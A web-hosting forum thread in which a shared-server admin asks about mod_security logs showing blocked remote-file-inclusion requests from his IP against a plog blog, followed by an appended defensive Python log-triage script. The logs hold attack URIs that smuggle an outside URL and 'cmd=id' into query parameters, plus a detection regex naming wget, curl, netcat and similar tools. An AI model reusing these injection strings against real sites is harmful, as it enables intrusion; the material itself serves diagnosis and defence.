  1. #1

    attack from mod security?

    Code:
    [Sun Sep 10 21:01:51 2006] [error] [client xxx.xxx.xx.xxx] mod_security: Access denied with code 403. Pattern match "(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|cat|pagina|path|include_location|root|page|gorumDir|site|topside|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |lwp-(download|request|mirror|rget) |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm \-[a-z|A-Z]))" at REQUEST_URI [severity "EMERGENCY"] [hostname "malwareremoval.com"] [uri "/plog/index.php?op=http://busca.uol.com.br/uol/index.html?&cmd=id&articleId=74&blogId=3"] [unique_id "GmtSE1KltBMAAHLtYzAAAAAW"]
    [Sun Sep 10 21:01:51 2006] [error] [client xxx.xxx.xx.xxx] mod_security: Access denied with code 403. Pattern match "(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|cat|pagina|path|include_location|root|page|gorumDir|site|topside|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |lwp-(download|request|mirror|rget) |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm \-[a-z|A-Z]))" at REQUEST_URI [severity "EMERGENCY"] [hostname "malwareremoval.com"] [uri "/plog/index.php?op=ViewArticle&articleId=http://busca.uol.com.br/uol/index.html?&cmd=id&blogId=3"] [unique_id "GneMgFKltBMAAHEkNIAAAAAL"]
    [Sun Sep 10 21:01:52 2006] [error] [client xxx.xxx.xx.xxx] mod_security: Access denied with code 403. Pattern match "(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|cat|pagina|path|include_location|root|page|gorumDir|site|topside|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |lwp-(download|request|mirror|rget) |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm \-[a-z|A-Z]))" at REQUEST_URI [severity "EMERGENCY"] [hostname "malwareremoval.com"] [uri "/plog/index.php?op=ViewArticle&articleId=74&blogId=http://busca.uol.com.br/uol/index.html?&cmd=id"] [unique_id "Gn9lzVKltBMAAHF4r8cAAAAA"]
    Someone (someone else hosting the malwareremoval.com site) complained of an attack coming from my server IP, which is strange. How would mod security cause an attack on another server?

  2. #2
    Join Date: Apr 2002 | Location: USA | Posts: 5,779
    I assume the IP address that is xx'd out in there is your IP, and that those are the log files they sent you to show it was an attack?

    If so, they are not saying modsec was attacking anything; that is their log file showing that your server tried to attack theirs, and it is their mod security that blocked the attack.

  3. #3
    Strange coincidence that I have the same rules (I checked). Are you 100% sure?
    How can I trace who is causing the attack if it is true? It's a shared web server.
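As an added example (not code from the thread or from mod_security), a small Python triage script that parses mod_security 1.x error-log entries like the ones posted above and reports, per blocked request, which query parameter carried a remote URL (the `(http|https|ftp)\:/` half of the rule) and which `cmd`/`command` value rode along, together with the time, source and unique_id a shared-hosting admin needs to correlate the request with per-account access logs on the originating server. The sample log is constructed in the same shape as the thread's entries, with the rule regex abbreviated and the client address masked as in the post.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: three entries in the shape of the mod_security 1.x error-log lines
# quoted in the thread (rule regex abbreviated, client address masked as in the post).
_REQUESTS = [
    ("1", "/plog/index.php?op=http://busca.uol.com.br/uol/index.html?&cmd=id&articleId=74&blogId=3", "GmtSE1KltBMAAHLtYzAAAAAW"),
    ("1", "/plog/index.php?op=ViewArticle&articleId=http://busca.uol.com.br/uol/index.html?&cmd=id&blogId=3", "GneMgFKltBMAAHEkNIAAAAAL"),
    ("2", "/plog/index.php?op=ViewArticle&articleId=74&blogId=http://busca.uol.com.br/uol/index.html?&cmd=id", "Gn9lzVKltBMAAHF4r8cAAAAA"),
]
SAMPLE_LOG = "\n".join(
    f'[Sun Sep 10 21:01:5{s} 2006] [error] [client xxx.xxx.xx.xxx] mod_security: Access denied with code 403. '
    'Pattern match "(\\?(op|page)=(http|https|ftp)\\:/|(cmd|command)=(cd|\\;|id|wget ))" at REQUEST_URI '
    f'[severity "EMERGENCY"] [hostname "malwareremoval.com"] [uri "{u}"] [unique_id "{i}"]'
    for s, u, i in _REQUESTS
)

ENTRY_RE = re.compile(r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<client>[^\]]+)\] mod_security: Access denied')
FIELD_RE = re.compile(r'\[(?P<key>severity|hostname|uri|unique_id) "(?P<val>[^"]*)"\]')
REMOTE_URL_RE = re.compile(r'^(https?|ftp):/', re.IGNORECASE)  # what the rule's (http|https|ftp)\:/ alternative catches
SHELL_PARAMS = ("cmd", "command")                               # the rule's (cmd|command)= alternative


def parse_entry(line):
    """Fields of one blocked-request entry (ts, client, severity, hostname, uri, unique_id), or None."""
    head = ENTRY_RE.match(line)
    if head is None:
        return None
    rec = head.groupdict()
    rec.update((m.group("key"), m.group("val")) for m in FIELD_RE.finditer(line))
    return rec


def triage(log_text):
    """One row per blocked request: which parameter carried a remote URL and which command rode along."""
    # time/source/target/unique_id are what the admin of the originating shared server correlates
    # with per-account access logs and outbound-connection records to find the offending account.
    rows = []
    for line in log_text.splitlines():
        rec = parse_entry(line)
        if rec is None:
            continue
        params = parse_qsl(urlsplit(rec.get("uri", "")).query, keep_blank_values=True)
        rfi = [(k, v) for k, v in params if REMOTE_URL_RE.match(v)]
        cmds = [v for k, v in params if k.lower() in SHELL_PARAMS]
        rows.append({"time": rec["ts"], "source": rec["client"], "target": rec.get("hostname"),
                     "rfi_param": rfi[0][0] if rfi else None, "payload_url": rfi[0][1] if rfi else None,
                     "command": cmds[0] if cmds else None, "unique_id": rec.get("unique_id")})
    return rows
```

Run `triage(SAMPLE_LOG)` to get one row per entry; on a real file, pass its contents and filter `source` for your own server's address.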
